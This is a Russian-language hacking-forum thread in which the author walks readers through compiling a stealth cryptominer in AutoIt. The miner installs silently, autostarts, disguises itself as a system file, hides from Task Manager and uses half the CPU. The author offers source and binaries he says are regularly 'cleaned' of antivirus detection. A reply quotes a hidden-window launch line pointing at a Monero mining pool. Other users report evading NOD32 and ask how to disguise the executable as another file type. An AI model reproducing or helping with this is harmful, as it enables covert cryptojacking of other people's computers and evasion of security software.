• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

После регистрации будут доступны основные разделы.

Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Авторская статья Мануал и исходники простого скрытого майнера. Для ленивых.

Kirito54

Живу как хочу

Kirito54

Живу как хочу
Местный
Реакции
109
0 руб.
Telegram
Этот майнер был написан, для того что бы люди не велись на "Бесплатный майнер, меняй мыло и всё", запомните такой халявы никто просто так не даёт. Я отдаю из за того, что надоело читать "меняй своё мыло и всё".
И так что нам понадобится :
1.Программа AutoIT скачать можно на офф.сайте
2.SciTE4Autoit3 -- ссылка на офф.сайт
3. Исходники
4. 10 минут времени

Приступим:
1.Создаём на диске "C" папку "1"
2. Устанавливаем AutoIT и SciTE4Autoit3, после этого открываем "SciTE Script Editor"
3.Копируем данный код:

4. После того как скопировали, сохраняете файл и нажимаем CTRL+F7

Выбираем папку "C:\1" и прописываем будущее имя вашего майнера, нажимаем "Compile Script"
Первая часть готова, теперь надо создать установщик майнера.
5. Копируем файл system.exe с архива в "C:\1"
6. Создаём новый скрипт, и вставляем туда следующий код

7. Нажимаем CTRL+F7, прописываем название, добавляем картинку. Можете так же добавить описание к файлу. Компилируем.

Всё. Теперь в паке куда вы последний раз прописали путь и название, находится ваш майнер.
Что он умеет?
1.Скрытая установка и работа
2.Автозагрузка
3.Останавливает майнинг, если открыт диспетчер задач.
4.Прописывает себя как системный файл.
5.По дефолту использует 50% ЦП

Все исходники есть в архиве, "голова майнера" была специально скомпилирована для vlmi.top
upload_2017-11-13_22-7-52.png
По просьбам, добавляю исходники скрипта для удаления, но перед запуском надо закрыть ваш файл в диспетчере.

Скачать архив с исходниками и "головой майнера"
UPD. Добавил в архив "голову" для x32 систем
UPD 17.11 Почистил от детекта.

Последнее редактирование:

Kirito54

Живу как хочу

Kirito54

Живу как хочу
Местный
Реакции
109
0 руб.
Telegram
Личный не даю!

Макс

Участник
Реакции
46
0 руб.
Ох сейчас понабегут умельцы, ты бы файлик к теме прикрепил на удаление всего этого из системы, а то ведь сначала некоторые делают а потом думают)
Может кто знающий написать как код написан правильно или мы сами своими руками комп свой предаем и обрекаем на мученья)

AlkaSeltzer

Канадский программист

AlkaSeltzer

Канадский программист
Резидент
Реакции
409
0 руб.
Telegram
Ох сейчас понабегут умельцы, ты бы файлик к теме прикрепил на удаление всего этого из системы, а то ведь сначала некоторые делают а потом думают)
Может кто знающий написать как код написан правильно или мы сами своими руками комп свой предаем и обрекаем на мученья)
Мучения и медленную смерть в агонических спазмах))

Kirito54

Живу как хочу

Kirito54

Живу как хочу
Местный
Реакции
109
0 руб.
Telegram
Если не могут посмотреть по коду, что и куда прописывается (для того что бы удалить), то незачем и пытаться это сделать)

Torius

Участник
Реакции
36
0 руб.
Годно, хоть я и не занимаюсь подобным.
Лучше подними хайд, а то скоро будут "личный" майнер продавать...

Kirito54

Живу как хочу

Kirito54

Живу как хочу
Местный
Реакции
109
0 руб.
Telegram
Годно, хоть я и не занимаюсь подобным.
Лучше подними хайд, а то скоро будут "личный" майнер продавать...
Его лучше не продавать, так как его очень легко удалить с системы. А если сделают модуль самовостановления, то и флаг им в руки)

Kirito54

Живу как хочу

Kirito54

Живу как хочу
Местный
Реакции
109
0 руб.
Telegram
Я пришёл к выводу что каждые 2-3 дня, в течении месяца буду чистить "голову" от деткта. Так что если кому надо, следите за темой.

Kirito54

Живу как хочу

Kirito54

Живу как хочу
Местный
Реакции
109
0 руб.
Telegram
Был баг в коде, обновил исходники. Теперь всё будет работать как часы)

Kirito54

Живу как хочу

Kirito54

Живу как хочу
Местный
Реакции
109
0 руб.
Telegram
Могу дать исходники "Головы майнера" только администрации, для проверки.

Reisez

Местный
Реакции
62
0 руб.
Проверял я како-то на дедике майнер, где надо было "поменять почту и вы будете получать 99999999$ в секунду"...
Запустил: Загрузка ЦП-100%. Через пару часов вылезают окна, мол ваши файлы перекриптованы и давай плати мне.
Так что подтверждаю слова автора... За просто так вряд ли кто-то вам отдаст что-то ;)

Kirito54

Живу как хочу

Kirito54

Живу как хочу
Местный
Реакции
109
0 руб.
Telegram
Добавил скрипт для удаления)

Kirito54

Живу как хочу

Kirito54

Живу как хочу
Местный
Реакции
109
0 руб.
Telegram
Почистил "Головы" от детекта

Kirito54

Живу как хочу

Kirito54

Живу как хочу
Местный
Реакции
109
0 руб.
Telegram
Если кому то нужен приватный билд головы, пишите в ЛС (если сольют на вт общедоступную голову)

linuxis

Местный
Реакции
62
0 руб.
Если кому то нужен приватный билд головы, пишите в ЛС (если сольют на вт общедоступную голову)
Спасибо за предоставленную информацию, слепил, что то вроде майнера)Даже что то капает с моих двух ядер
Для просмотра содержимого вам необходимо авторизоваться.

Ещё вопрос как
Для просмотра содержимого вам необходимо авторизоваться.

Описание изменить? и сделать файл не в ехе а в другом расширение?
Понимаю, что гугл есть, но что то как то лень)
Ps:Nod32 пропустил без проблем))

Kirito54

Живу как хочу

Kirito54

Живу как хочу
Местный
Реакции
109
0 руб.
Telegram
Спасибо за предоставленную информацию, слепил, что то вроде майнера)Даже что то капает с моих двух ядер

Ещё вопрос как
Только .exe файл будет на выходе. А менять описание надо, когда компилишь через ctrl+F7. Вторая вкладка вроде.

Serg84

Местный
Реакции
65
0 руб.

Ещё вопрос как
Дружище, как поменять с еxe на word, да чтобы без макросов и не дорого, это основной вопрос современности))))

M1sty

Местный
Реакции
79
0 руб.
Ребят,подскажите,пожалуйста.Вот включаю майнер,а на сайте всё равно offline,даже с самого клиента оффлайн,другие включают,тоже оффлайн.С чем это связано вообще?

linuxis

Местный
Реакции
62
0 руб.
Ребят,подскажите,пожалуйста.Вот включаю майнер,а на сайте всё равно offline,даже с самого клиента оффлайн,другие включают,тоже оффлайн.С чем это связано вообще?
Скорее всего в адресе электронной почты ошибся
Run ("system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x ","",@SW_HIDE) ; Тут пишем своё

Сверху Снизу